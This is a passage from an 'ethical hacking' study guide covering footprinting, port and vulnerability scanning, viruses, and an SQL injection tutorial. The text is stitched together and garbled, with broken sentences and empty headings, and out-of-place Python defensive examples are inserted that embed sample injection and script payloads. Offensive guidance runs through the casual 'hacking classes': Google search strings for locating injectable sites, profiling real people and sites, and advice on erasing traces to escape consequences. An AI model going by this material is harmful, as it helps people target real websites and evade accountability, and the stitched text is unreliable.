Study Guide
Introduction
Welcome to the exciting world of the Elysium certification program! You have picked up
this book because you want something better in your career. Elysium is committed to giving
you better technology updates through it. You have made a good decision to pursue career
certification at Elysium, and we can help you get your best networking job, or more money
and a promotion if you are already in the field. Cisco certification can also improve your
understanding of internetworking beyond just Cisco products: you will develop a complete
understanding of networking and how different network topologies work together to form a
network. This is beneficial to every networking job and is the reason Elysium teaching is in
such high demand, even at companies with few Cisco devices.
Attackers break into systems for various reasons and purposes. Therefore, it is important to
understand how malicious hackers exploit systems and the probable reasons behind the
attacks.
This module starts with an overview of the current security scenario and emerging threat
vectors. It provides an insight into the different elements of information security.
Module Flow
database to crash. As a result, developers and users were unable to upload or download any
applications.
There is a very thin line between a hacker and a cracker. Like a coin has two faces, heads
or tails, the same is true for computer experts. Some use their techniques and expertise to
help others and secure systems or networks, and some misuse them for their own selfish
reasons.
There are several traditional ways of determining the difference between hackers and
crackers. In this book we will present these ways in order of their acceptance in the
computer and IT market. First of all, let me give you the basic definitions of both hackers
and crackers.
Crackers:
called criminals because they have the mind-set of causing harm to security; they steal very
useful data and use it in wrong ways. Phishers also come in this category: they steal account
information, credit card numbers and money over the Net.
Below is a diagram which shows the basic difference between crackers (black hat hackers)
and hackers (ethical hackers or white hat hackers).
We hope this will help you clear most of your doubts about hackers and crackers. And the
most important thing: unless an ethical hacker thinks like a cracker, he can never become an
expert ethical hacker, because to get the most out of any computer system you must
understand the mind-set of crackers, what they can do and to what level they can do damage.
Now, when you identify vulnerabilities and loopholes: if you fix them so that in future nobody
can breach that same vulnerability, you are a hacker, ethical hacker or white hat hacker; if
you use that loophole for misdeeds or for fun, that is cracking or black hat hacking. Black hat
hackers are intelligent people but criminals, or, as cyber cops simply call them, evil geniuses.
But you can also give the Matriux operating system and Knoppix a try. Matriux OS is just
awesome, but it's still under construction as the designers are still working on it and patching it.
Now let's discuss more about the functionality of the BackTrack operating system.
BackTrack features the latest in security penetration software. The current Linux kernel is
patched so that special driver installation is unnecessary for attacks. For example, an
Atheros-based wireless networking adapter will not enter monitor mode or inject packets
without the MadWiFi driver patch. With BackTrack, you don't need to worry about that. It's
just plug-and-play, ready to go!
What's great is that this Linux distribution comes live on CD, so no installation is needed.
However, once you experience BackTrack, you will realize that it is a must to download this
operating system and install it on your laptop. At the very least, download the VMware
virtual appliance for BackTrack. Make sure you also install the VMware Tools for Linux.
Many features will still work in VMware mode.
Origin: Switzerland
Architecture: i386
Cost: Free
Hacking Tools:
BackTrack provides users with easy access to a comprehensive and large collection of
security-related tools ranging from port scanners to password crackers. Support for
Live CD and Live USB functionality allows users to boot BackTrack directly from
portable media without requiring installation, though permanent installation to hard
disk is also an option.
BackTrack includes many well known security tools including:
Metasploit integration
Kismet
Nmap
Ettercap
Information Gathering
Network Mapping
Vulnerability Identification
Privilege Escalation
Maintaining Access
copyright 2016 EAPL
Digital Forensics
Reverse Engineering
Voice Over IP
What Is FOOTPRINTING?
Basically a footprint is the blueprint of the site/organisation/system that a hacker wants to
hack, i.e. its basic internal structure. Footprinting is the blueprint of the security profile of
an organization, undertaken in a methodological manner.
Footprinting is one of the three pre-attack phases. The others are scanning and enumeration.
Important thing to be noted: an attacker will spend 90% of the time profiling an
organization and the other 10% launching the attack.
Footprinting results in a unique organization profile with respect to the networks
(Internet/intranet/extranet/wireless) and systems involved. Doesn't it look amazing?
The most interesting stage of a targeted attack is reconnaissance, or footprint analysis.
Here you use the web, search engines and whois.com to discover as much about the target as
possible. A whois.com lookup can tell you email address formats, for instance (first letter +
last name @ company.com).
A Google search could reveal submissions to forums by security personnel that reveal the
brands of firewall or antivirus in use at the target. Sometimes network diagrams are even
found that can guide an attack. The next stage, scanning, meant using special tools (I date
myself by mentioning Cybercop and Internet Security Scanner; these were the days before the
open source Nessus) to discover open ports, services, and machines on the target network. And
then, finally, you could start attacking the various vulnerabilities that you had discovered.
SITES THAT HELP IN FOOTPRINTING!
1. www.whois.domaintools.com
Now, how it can help you to get
2. Now you can use this information to search for more about the person simply using Google, as
shown in the next snapshot.
Now it's up to you how much info you want to explore about the person and the website which
you want to hack.
I think you all will like this. We will continue our discussion on FOOTPRINTING tomorrow
also, as it is the most important phase.
We will explore more information in the next class. I will explain a few more interesting
facts and information-exploring things, so read on.
UNEARTHING BASIC INFORMATION
First of all we will focus on unearthing the basic information about the site, i.e. the IP and
server information.
I will show you with the help of snapshots:
First go to START > RUN > type cmd > then type tracert www.websitename.com
Here we will use two basic commands in the command prompt (cmd): tracert
www.webistetobeanlysed.com
and ping www.websitename.com
It will look something like this:
We trace-routed www.amulive.com:
1. Shows our gateway of connectivity.
2. Shows our outgoing footprint IP (i.e. our IP that is being analysed by the website).
3. Shows which service provider the connectivity passes through. I use BSNL but it's showing
Airtel because I prefer Airtel's DNS for quick surfing.
The next steps show the IPs of the web servers through which amulive is being maintained.
After this we come to know the IP of the website and the IPs of its web servers which are
being used further.
The website IP can be used to gather more information about the website.
How to find the personal information about an individual over the Net?
It's one of the most important tasks. It's also helpful in finding fake profiles, but
unfortunately this is limited. Still, we can use it to the most. There are two websites which
will help us:
1. http://people.yahoo.com (best site to trace people for their personal information and also
reverse phone or mobile number look-up)
Now, using these sites, you will be able to collect the personal information of individuals
and also be able to identify fake profiles.
SpiderFoot is a free, open-source domain footprinting tool. Given one or multiple domain
names (and when I say domains, I'm referring to the DNS kind, not Windows domains), it
will scrape the websites on that domain, as well as search Google, Netcraft, Whois and DNS
to build up information like:
Subdomains
Affiliates
Web server versions
Users (i.e. /~user)
Similar domains
Email addresses
Netblocks
Whois
Nslookup
ARIN
Neo Trace
VisualRoute Trace
SmartWhois
eMailTrackerPro
Website watcher
Google Earth
GEO Spider
HTTrack Web Copier
E-mail Spider
This is all about Footprinting. Now use the gathered information to build a basic
detailed profile of the website/person.
We will prefer tools for this because they will reduce our hectic work. The first tool
that we use is NMAP:
DOWNLOAD: http://nmap.org/dist/nmap-5.00-setup.exe
Features of NMAP :
~ Nmap is used to carry out port scanning, OS detection, version detection, ping sweep, and
many other techniques.
~ It scans a large number of machines at one time.
~ It is supported by many operating systems.
~ It can carry out all types of port scanning techniques.
SECOND TOOL IS NET TOOLS 5.0.70 :
It is a collection of various networking tools, a must for beginners.
DOWNLOAD: http://www.softpedia.com/progDownload/Net-Tools-Download-22193.html
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:
What is Vulnerability?
As I told you in the first class, a vulnerability is a weakness in a network, system, database
etc. We can call a vulnerability a loophole, i.e. something through which the victim can be
attacked. We first analyse the loophole and then try to use it to the fullest to hack the
system of the victim or organisation or website.
TOOLS THAT WE USE FOR VULNERABILITY SCANNING ARE :
1. Nessus
2. Retina
NESSUS
The Nessus vulnerability scanner is the world leader in active scanners, featuring high-speed
discovery, configuration auditing, asset profiling, sensitive data discovery and
vulnerability analysis of your security posture. Nessus scanners can be distributed throughout
an entire enterprise, inside DMZs, and across physically separate networks.
Features:
~ Plug-in-architecture
~ NASL (Nessus Attack Scripting Language)
~ Can test unlimited number of hosts simultaneously
~ Smart service recognition
~ Client-server architecture
~ Smart plug-ins
~ Up-to-date security vulnerability database
SAMPLE SNAPSHOT:
DOWNLOAD NESSUS :
http://www.nessus.org/download/
RETINA
Retina Network Security Scanner, the industry and government standard for multi-platform
vulnerability management, identifies known and zero day vulnerabilities plus provides
security risk assessment, enabling security best practices, policy enforcement, and regulatory
audits.
Features:
~ Retina network security scanner is a network vulnerability assessment scanner.
~ It can scan every machine on the target network, including a variety of operating system
platforms, networking devices, databases, and third party or custom applications.
~ It has the most comprehensive and up-to-date vulnerability database and scanning
technology.
SAMPLE SNAPSHOT:
DOWNLOAD RETINA:
http://www.eeye.com/html/products/retina/download/index.html
Now, after scanning the systems for vulnerabilities, we are going to attack the systems, but
before this we should know the risk. This risk can be reduced to a great extent by using
proxies. In the next class we will discuss what proxies are, how they work, how they are going
to help us, and some undetectable and untraceable proxy servers.
Definition of scanning
Types and objectives of Scanning
Understanding Scanning methodology
Checking live systems and open ports
Understanding scanning techniques
Different tools present to perform Scanning
Understanding banner grabbing and OS fingerprinting
Drawing network diagrams of vulnerable hosts
Preparing proxies
~ Understanding anonymizers
~ Scanning countermeasures
Operating system
System Architecture
I want to define these terms here only, as they are of great use in the further tutorial.
PORT SCANNING : There are 64k ports in a computer, out of which 1k are fixed for
system or OS services. In port scanning we scan for the open ports which can be used to
attack the victim computer.
In port scanning a series of messages is sent to a computer to learn about the computer's
network services. Through this we will know which port we will use to attack the victim.
Network Scanning : Network scanning is basically a procedure for finding the active hosts
on the network, i.e. we try to find whether a system is standalone or multi-user.
This is done either for the purpose of attacking them or for network security assessment,
i.e. how secure the network is.
Vulnerability Scanning : As the name says, in this type of scanning we scan the systems to
find vulnerabilities, i.e. weaknesses in the OS/database. Once we find the vulnerability or
loophole we can utilize it to the fullest and attack the victim through it.
OBJECTIVES OF SCANNING
These are Primary objectives of scanning i.e why do we do scanning :
~ To detect the live systems running on the network.
~ To discover which ports are active/running.
~ To discover the operating system running on the target system (fingerprinting).
~ To discover the services running on the target system.
~ To discover the IP address of the target system.
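The objectives above describe a scan from the scanner's side. From the defender's side the same activity shows up in firewall or IDS logs as one source touching many ports on one host (a port scan) or one port on many hosts (a network sweep) within a short time, which is what the "scanning countermeasures" item in the module outline rests on. The following Python is an added example and not code from the study guide: it parses constructed firewall-style log lines (the `timestamp action src= dst= dport=` format, the TEST-NET addresses, and the thresholds are all assumptions made for the demonstration) and flags sources whose activity inside a sliding window exceeds either threshold.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed firewall-style log lines (TEST-NET addresses, not a real network):
# one source probing many ports on one host, one source probing port 80 on many
# hosts, and one ordinary client repeating a single connection.
SAMPLE_LOG = (
    ["2016-03-01T10:00:%02d DROP src=203.0.113.5 dst=192.0.2.10 dport=%d" % (i, p)
     for i, p in enumerate([21, 22, 23, 25, 53, 80, 110, 143, 443, 445, 3306, 3389])]
    + ["2016-03-01T10:05:%02d DROP src=203.0.113.9 dst=192.0.2.%d dport=80" % (i, i + 1)
       for i in range(6)]
    + ["2016-03-01T10:07:00 ACCEPT src=198.51.100.7 dst=192.0.2.10 dport=443",
       "2016-03-01T10:07:30 ACCEPT src=198.51.100.7 dst=192.0.2.10 dport=443"]
)

# Assumed log format; adjust the pattern for a real firewall's syntax.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>\w+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+)$"
)


def parse_events(lines):
    """Turn log lines into (timestamp, src, dst, dport) tuples, skipping unparseable lines."""
    events = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dport"])))
    return sorted(events)


def detect_scans(lines, window=timedelta(seconds=60), port_threshold=10, host_threshold=5):
    """Flag a source as 'port scan' when it reaches port_threshold distinct ports on one
    host, or 'network sweep' when it reaches host_threshold distinct hosts, counting
    only events that fall within `window` of each starting event."""
    by_src = defaultdict(list)
    for ev in parse_events(lines):
        by_src[ev[1]].append(ev)

    findings = defaultdict(set)
    for src, evs in by_src.items():
        for i, (t0, _, _, _) in enumerate(evs):
            in_window = [e for e in evs[i:] if e[0] - t0 <= window]
            ports_per_host = defaultdict(set)
            for _, _, dst, dport in in_window:
                ports_per_host[dst].add(dport)
            if len(ports_per_host) >= host_threshold:
                findings[src].add("network sweep")
            if max(len(ports) for ports in ports_per_host.values()) >= port_threshold:
                findings[src].add("port scan")
    return {src: sorted(labels) for src, labels in findings.items()}


if __name__ == "__main__":
    for src, labels in detect_scans(SAMPLE_LOG).items():
        print(src, ", ".join(labels))
```

The window is evaluated from every event of a source, so a slow scan that stays under the thresholds inside any 60-second span is deliberately not flagged; lowering the thresholds or widening the window trades that miss against false positives from busy legitimate clients.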
I think that's enough for today. We will discuss more on scanning tomorrow; until then, try
these tools.
If you have any problem using these tools then you can ask me; I will help you use these
tools.
VIRUSES:
A virus is a self-replicating program that produces its own code by attaching copies of itself
to other executable code like executable files (.exe), dynamic link libraries (.dll) etc.
A virus generally operates in the background and, of course, without the desire of the user, as
no one wants a virus to harm their computer. ROFL :P
Some Well-known Characteristics of Viruses:
Resides in the memory and replicates itself while the program where it attached is
running
Does not reside in the memory after the execution of program
Can transform themselves by changing codes to appear different
Fig: Infection phase, showing how the virus attaches itself to .exe files to infect programs.
Fig: Attack phase, showing how files get fragmented and system speed slows down.
Research projects (people doing research work detect the flaws in a particular
system and create code for that)
Pranks (just for fun, like people who create viruses for irritating friends)
Vandalism
To attack the products of specific companies (like Microsoft products
XP, Vista, Windows 7 etc.)
To distribute political messages
Financial gain (stealing money from accounts etc.)
Identity theft
Spyware (to monitor the working of remote computers)
If the system acts in an unprecedented manner, you can suspect a virus attack; that is,
processes take more resources and are more time-consuming than before, i.e. the system hangs
frequently.
Some More are mentioned Below:
If computer beeps with no display
If one out of two anti-virus programs report virus on the system
If the label of the hard drive change
Your computer freezes frequently or encounters errors
Your computer slows down when programs are started
You are unable to load the operating system
Files and folders are suddenly missing or their content changes
Your hard drive is accessed too often (the light on your main unit flashes rapidly)
Microsoft Internet Explorer freezes
Your friends mention that they have received messages from you but you never sent
such messages
Most of us think that worms are viruses and their working is similar to viruses, but this is not
the real scenario. There is a big difference between general viruses and worms.
A worm is a special type of virus that can replicate itself and use memory, but cannot
attach itself to other programs. A worm spreads through the infected network
automatically, but a virus does not.
How To Detect Your System is Infected by Virus??
This is one of the major question to answer and the simplest answer to it is that there are
some General Indications that Indicates that System is infected or Not.
General Indications are stated Below:
Programs take longer to load than normal (because virus halts the normal working of
programs as it attaches itself to it, so the execution time increases) .
Computers hard drive constantly runs out of free space.
Files have strange names which are not recognizable.
Programs act erratically (Programs Gives errors on use)
Resources are used up easily (can be Easily viewed using task manager).
1. Loads itself into memory and checks for executables on the disk.
2. Appends the malicious code to a legitimate program which is important to the user.
3. Since the user is unaware of the replacement, he/she launches the infected program.
4. As a result of the infected program being executed, other programs get infected as
well.
5. The above cycle continues until the user realizes the anomaly within the system.
The life cycle indicated above is a general life cycle of the Virus from design Phase to
Elimination phase
VIRUS CLASSIFICATION TYPES OF VIRUSES
Viruses are classified on the basis of two basic Things:
1. What they Infect
2. How they infect
Examples:
System Sector or Boot Virus:
- Infects disk boot sectors and records.
File Virus:
-
Macro Virus:
- Infects documents, spreadsheets and databases such as Word, Excel and
Access.
Source Code Virus:
-
Stealth Virus
These viruses evade anti-virus software by intercepting its requests to the operating system.
A virus can hide itself by intercepting the anti-virus software's request to read the file and passing the
request to the virus, instead of the OS. The virus can then return an uninfected version of the file to
the anti-virus software, so that it appears as if the file is clean.
Self-Modification Virus
Most modern antivirus programs try to find virus-patterns inside ordinary programs by scanning them
for virus signatures.
A signature is a characteristic byte-pattern that is part of a certain virus or family of viruses.
Self-modification viruses employ techniques that make detection by means of signatures difficult or
impossible. These viruses modify their code on each infection. (each infected file
contains a different variant of the virus)
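The infection cycle listed earlier (a file virus appending itself to a legitimate program) and the signature discussion just above have a direct defensive counterpart: a cryptographic hash baseline flags any change to a monitored file no matter what bytes were appended, while a signature scan only finds byte patterns it already knows, which is exactly the gap self-modifying variants exploit. The following Python is an added example and not code from the study guide. It builds a SHA-256 baseline over a constructed temporary directory, simulates one appended marker, one dropped file and one altered variant, and compares what the signature scan and the integrity check each report. The marker bytes, file names and "signature" name are made up for the demonstration and are not real malware signatures.

```python
import hashlib
import os
import tempfile

# Constructed byte patterns standing in for a signature database. "Marker.A" is the
# only pattern the scanner knows; a variant that changes one byte is not in the list.
SIGNATURES = {
    "Demo.Marker.A": b"DEMO-MARKER-A",
}


def sha256_of(path):
    """Stream a file through SHA-256 so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(directory):
    """Map every file name in the directory to its current hash."""
    return {name: sha256_of(os.path.join(directory, name)) for name in sorted(os.listdir(directory))}


def check_integrity(directory, baseline):
    """Compare the directory's current state against a stored baseline."""
    current = build_baseline(directory)
    return {
        "modified": sorted(n for n in baseline if n in current and current[n] != baseline[n]),
        "added": sorted(n for n in current if n not in baseline),
        "missing": sorted(n for n in baseline if n not in current),
    }


def scan_signatures(directory):
    """Signature scan: report files containing any known byte pattern."""
    hits = {}
    for name in sorted(os.listdir(directory)):
        with open(os.path.join(directory, name), "rb") as f:
            data = f.read()
        matched = [sig for sig, pattern in SIGNATURES.items() if pattern in data]
        if matched:
            hits[name] = matched
    return hits


def integrity_demo():
    """Run both checks over a constructed directory; returns (integrity_report, signature_hits)."""
    with tempfile.TemporaryDirectory() as d:
        # Constructed stand-ins for the user's legitimate executables.
        for name, body in {"calc.exe": b"MZ calc body", "notes.exe": b"MZ notes body"}.items():
            with open(os.path.join(d, name), "wb") as f:
                f.write(body)
        baseline = build_baseline(d)

        # Simulated infection cycle step 2: the known marker is appended to calc.exe.
        with open(os.path.join(d, "calc.exe"), "ab") as f:
            f.write(b"\n" + SIGNATURES["Demo.Marker.A"])
        # A dropped file carrying the known marker...
        with open(os.path.join(d, "dropper.exe"), "wb") as f:
            f.write(b"MZ " + SIGNATURES["Demo.Marker.A"])
        # ...and a self-modified variant whose pattern differs by one byte.
        with open(os.path.join(d, "variant.exe"), "wb") as f:
            f.write(b"MZ DEMO-MARKER-B")

        return check_integrity(d, baseline), scan_signatures(d)


if __name__ == "__main__":
    report, hits = integrity_demo()
    print("integrity:", report)
    print("signatures:", hits)
```

The variant is invisible to the signature scan but the integrity report still lists it under "added", and the modified calc.exe is caught by both. In practice the baseline itself has to be stored where the monitored system cannot rewrite it, otherwise a stealth virus of the kind described above could simply refresh it.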
A well-written polymorphic virus therefore has no parts that stay the same on each infection. To enable
polymorphic code, the virus has to have a polymorphic engine (also called a mutating engine or
mutation engine). Polymorphic code is code that mutates while keeping the original algorithm intact.
Metamorphic Virus
Metamorphic viruses rewrite themselves completely each time they are to infect new executables.
Metamorphic code is code that can reprogram itself by translating its own code into a temporary
representation, and then back to normal code again.
For example, W32/Simile consisted of over 14000 lines of assembly code, 90% of which is part of the
metamorphic engine.
you ignore the alert and keep the keygen, meaning the trojan, running.
NOTE: And guys, an important note for you all: if your antivirus doesn't show a keygen
or crack as a virus then don't ever think that it's not a virus; it's a most dangerous
thing. Why dangerous? Because now the hacker has used some more brain to fool you: he
has made the virus undetectable simply by editing the hex code of the original virus. So what is
the moral of the story? Please don't use cracked versions.
Now you will all be thinking that if we don't use the cracked versions then how will we be
able to get full versions of the software. Don't worry, when I am there, no fear, drink beer and
enjoy everything for free. Its solution will be in the solutions step, just read the article.
2. Pen drive or USB drive :
The biggest cause of infection of your system is USB drives and external hard disks.
Now, how does a virus enter your system using USB drives? You have connected your
USB drive to your friend's computer and by chance (sorry, it's for sure, i.e. 100%) your
friend's system is infected by a virus or trojan, and it's the property of a virus that it
replicates itself using memory. So when you connect your USB to your friend's computer
your USB is now infected by the virus, and now when you connect this USB to your PC,
Windows, by its property of searching the files on a newly connected device and
autorunning the device, loads the index of your USB's file system into memory, and now if
the USB has a virus it's the property of the virus that it replicates itself using system
memory. Now if you are using a good antivirus, your antivirus will pop up warning and
alert messages, and sometimes you ignore them, meaning your system is also infected.
For the USB drive virus solution keep reading the article.
3. Downloading things from unknown sites:
Most users search for things over the internet, and wherever they find their desired
result, meaning the file that they want, they start downloading it from that site only.
Now how does it affect your system? Suppose you want to download a wallpaper, say of Katrina
Kaif. Hackers know the fact that Katrina has a huge fan following and users will surely
download it. Then what they do is simply bind their malicious code with some of the files,
and when a user downloads it his system is infected, and he can never imagine that the
virus has come from the wallpaper that he downloaded from an unknown site. For its solution
read on in the article.
4. The most important one: becoming a hacker like me (ROFL, but it's the truth).
Why I have mentioned this might be clear from the above discussion. Most internet users
are always curious to know ways to hack a friend's email account or his system, and for
this they download all types of shit from the internet, and believe me, 99.9% of this shit
contains viruses and trojans that send your information to the providers. Now I don't say
stop hacking, but try to follow some basic steps to learn hacking, and first of all you must
know how to protect yourself from such fake software. For its solution read on in the article.
Now, after discussing how your system gets infected by your simple negligence, it's time
you should know how to fix them and protect your system from all types of viruses and
trojans.
Best Free Anti-Spyware: Spyware Terminator with Crawler web security toolbar.
Download it for free:
http://www.filehippo.com/download_spyware_terminator/
Install Spyware Terminator with the web security toolbar. Now your following problems are
solved:
1. No trojan can attack you.
2. Protection from malicious websites and much more.
The solution to this problem is already provided: the web browser security toolbar will help
you in surfing only secured and genuine websites, and if you want to visit and download,
VirusTotal will help you identify whether the file is infected or not.
4. And most important, expertise in removing traces, otherwise you have to suffer the consequences.
Now the first two things you can learn from a very famous website for the basics of website
design, with basics of HTML, SQL, PHP and JavaScript:
http://www.w3schools.com/
And for the fourth point, that you should be expert in removing traces, you can refer to the
first 5 hacking classes and specially read these two:
1. Hiding Yourself from being traced.
2. Removing your Traces
As we know, traces are very important. Please don't ignore them, otherwise you can be in big
trouble for simply doing nothing. So please take care of this step.
1. SQL INJECTION
2. CROSS SITE SCRIPTING
3. REMOTE FILE INCLUSION
4. LOCAL FILE INCLUSION
5. DDOS ATTACK
6. EXPLOITING VULNERABILITY.
1. SQL INJECTION
First of all, what is SQL injection? SQL injection is a type of security exploit or loophole in
which an attacker injects SQL code through a web form or manipulates URLs based on
SQL parameters. It exploits web applications that use client-supplied SQL queries.
The primary form of SQL injection consists of direct insertion of code into user-input variables that
are concatenated with SQL commands and executed. A less direct attack injects malicious code into
strings that are destined for storage in a table or as metadata. When the stored strings are
subsequently concatenated into a dynamic SQL command, the malicious code is executed.
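The "direct insertion of code into user-input variables that are concatenated with SQL commands" described above can be shown side by side with its fix in a few lines. The following Python is an added example and not code from the study guide: it uses an in-memory SQLite table as a constructed stand-in for a site's users table (the row contents and the "hash-x" values are made up), runs the same lookup once through string concatenation and once through a parameterised query, and shows that a quote in the input changes the query's meaning in the first case and is treated as plain data in the second. The helper `leaks_syntax_error` checks the symptom the tutorial later relies on, an SQL syntax error triggered by a stray quote, and is used here to confirm that the fix removes it.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for a site's users table (sample rows, fake hashes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "hash-a"), (2, "alice", "hash-b"), (3, "bob", "hash-c")],
    )
    return conn


def lookup_vulnerable(conn, username):
    """The primary form of injection: user input concatenated straight into the SQL text."""
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, username):
    """Parameterised query: the value travels separately from the SQL text, so a quote
    inside it is data for the database engine, never part of the SQL grammar."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


def leaks_syntax_error(lookup, conn):
    """True if a single stray quote in the input reaches the SQL parser and breaks the query.
    That is the tell-tale behaviour the tutorial describes; a fixed lookup never shows it."""
    try:
        lookup(conn, "7'")
        return False
    except sqlite3.OperationalError:
        return True


def sqli_demo():
    """Run both lookups with a normal name and with a constructed tautology input."""
    conn = build_db()
    tautology = "x' OR '1'='1"   # constructed: closes the string literal and appends a true condition
    return {
        "vuln_normal": lookup_vulnerable(conn, "alice"),
        "vuln_tautology": lookup_vulnerable(conn, tautology),
        "vuln_leaks_error": leaks_syntax_error(lookup_vulnerable, conn),
        "safe_normal": lookup_safe(conn, "alice"),
        "safe_tautology": lookup_safe(conn, tautology),
        "safe_leaks_error": leaks_syntax_error(lookup_safe, conn),
    }


if __name__ == "__main__":
    for key, value in sqli_demo().items():
        print(key, value)
```

With concatenation the tautology input returns every row and the stray quote raises a syntax error that a web application would typically echo to the page; with the parameterised query the same inputs return nothing and raise nothing, which is the behaviour a defender wants to see when probing their own application. The same pattern applies to the "less direct" stored form described above: values read back out of a table are still untrusted input and must also be bound as parameters rather than concatenated.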
are very popular, and some of the biggest websites have been affected by them,
including the FBI, CNN, eBay, Apple, Microsoft, and AOL.
Some website features commonly vulnerable to XSS attacks are:
Search Engines
Login Forms
Comment Fields
Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side
security mechanisms normally imposed on web content by modern browsers. By finding ways of
injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive
page content, session cookies, and a variety of other information maintained by the browser on behalf
of the user. Cross-site scripting attacks are therefore a special case of code injection.
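The paragraph above says cross-site scripting is a special case of code injection: untrusted text lands in a page where the browser reads it as markup. The defence is context-aware output encoding, and the following Python is an added example, not code from the study guide, showing it for the two contexts the feature list above mentions: a comment field (HTML body) and a search or login form that echoes input back inside an attribute value. The sample inputs are constructed; the `ActiveContentFinder` parser is a helper written only for this demonstration to show whether the rendered markup ends up containing a script tag or an inline event handler.

```python
import html
from html.parser import HTMLParser

# Constructed untrusted inputs standing in for a comment-field post and a search term.
SAMPLE_COMMENT = "<script>alert(1)</script>"
SAMPLE_SEARCH = '" onfocus="alert(1)'


def render_comment_vulnerable(comment):
    """Untrusted text dropped straight into the page body."""
    return '<div class="comment">' + comment + '</div>'


def render_comment_safe(comment):
    """HTML-body context: escaping <, >, & and quotes means the text can only ever be text."""
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'


def render_search_vulnerable(term):
    """Untrusted text echoed back inside an attribute value (search or login forms)."""
    return '<input name="q" value="' + term + '">'


def render_search_safe(term):
    """Attribute context: the same escaping keeps a stray quote from ending the attribute."""
    return '<input name="q" value="' + html.escape(term, quote=True) + '">'


class ActiveContentFinder(HTMLParser):
    """Demonstration helper: records script tags and on* attributes the browser would act on."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.found.append("script tag")
        for name, _ in attrs:
            if name.startswith("on"):
                self.found.append("event handler " + name)


def find_active_content(markup):
    """Parse rendered markup the way a browser would and list any active content."""
    parser = ActiveContentFinder()
    parser.feed(markup)
    parser.close()
    return parser.found


if __name__ == "__main__":
    for label, markup in [
        ("comment, vulnerable", render_comment_vulnerable(SAMPLE_COMMENT)),
        ("comment, escaped", render_comment_safe(SAMPLE_COMMENT)),
        ("search, vulnerable", render_search_vulnerable(SAMPLE_SEARCH)),
        ("search, escaped", render_search_safe(SAMPLE_SEARCH)),
    ]:
        print(label, "->", find_active_content(markup) or "no active content", "|", markup)
```

Escaping has to match the context the value is placed in: `html.escape` covers text and quoted attributes, but a value placed inside a script block, a URL, or CSS needs that context's own encoding, and a value that is meant to be a URL should additionally be checked for an allowed scheme before it is rendered into an `href`.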
I will explain this in detail in later hacking classes. So keep reading..
Code execution on the client-side such as Javascript which can lead to other attacks such as
cross site scripting (XSS).
Data Theft/Manipulation
5. DDOS ATTACK
Simply called a distributed denial of service attack. A denial-of-service attack (DoS attack)
or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer
resource unavailable to its intended users. Although the means to carry out, motives for, and targets of
a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an
Internet site or service from functioning efficiently or at all, temporarily or indefinitely. In a DDoS
attack we consume the bandwidth and resources of a website and make it unavailable to its
legitimate users.
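Since the attack described above works by consuming a service's capacity, the basic application-level mitigation is to cap how much of that capacity any one source may take. The following Python is an added example and not code from the study guide: a per-client sliding-window rate limiter replayed over constructed request traffic (the addresses, counts and the 20-requests-per-10-seconds limit are assumptions made for the demonstration), showing that an abusive source is cut off after its quota while an ordinary client is never denied, and that the source's quota returns once its burst has aged out of the window.

```python
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Allow at most max_requests per client within any span of window_seconds."""

    def __init__(self, max_requests, window_seconds):
        self.max_requests = max_requests
        self.window = window_seconds
        self.hits = defaultdict(deque)   # client -> timestamps of requests that were allowed

    def allow(self, client, now):
        q = self.hits[client]
        while q and now - q[0] >= self.window:   # forget requests that left the window
            q.popleft()
        if len(q) >= self.max_requests:
            return False                         # quota used up: deny, and do not record it
        q.append(now)
        return True


def replay(requests, max_requests=20, window_seconds=10.0):
    """Feed (timestamp, client) pairs in time order; return per-client allowed/denied counts."""
    limiter = SlidingWindowLimiter(max_requests, window_seconds)
    counts = defaultdict(lambda: {"allowed": 0, "denied": 0})
    for ts, client in sorted(requests):
        counts[client]["allowed" if limiter.allow(client, ts) else "denied"] += 1
    return dict(counts)


# Constructed traffic: one source sends 50 requests in two seconds and one more 15 seconds
# later; an ordinary client makes five requests spread over ten seconds.
SAMPLE_REQUESTS = (
    [(0.04 * i, "203.0.113.5") for i in range(50)]
    + [(15.0, "203.0.113.5")]
    + [(2.0 * i, "198.51.100.7") for i in range(5)]
)


if __name__ == "__main__":
    for client, counts in replay(SAMPLE_REQUESTS).items():
        print(client, counts)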
For more detailed hack on DDOS visit:
6. EXPLOITING VULNERABILITY
It's not a new category; it comprises the above five categories, but I mentioned it separately because there
are several exploits which cannot be covered in the above five categories. So I will explain them
individually with examples. The basic idea behind this is to find the vulnerability in the website and
exploit it to get admin or moderator privileges so that you can manipulate things easily.
SQL INJECTION
Hello friends, in my previous class on how to hack websites I explained the various
topics that we will cover in the hacking classes. Let's today start with the first topic,
Hacking Websites using SQL injection tutorial. If you have missed the previous hacking
class, don't worry, read it here.
So guys, let's start our tutorial on hacking websites using the SQL injection technique.
First of all, I will provide you a brief introduction to SQL injection.
Note: This article is for Educational Purposes only. Please don't misuse
it. Isoftdl and I are not responsible for any misuse done by you.
MySQL is a very common database system these days that websites use, and you will be
surprised by the fact that it's the most vulnerable database system ever. It has unlimited
loopholes and fixing them is a very tedious task. Here we will discuss how to exploit those
vulnerabilities manually without any tool.
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
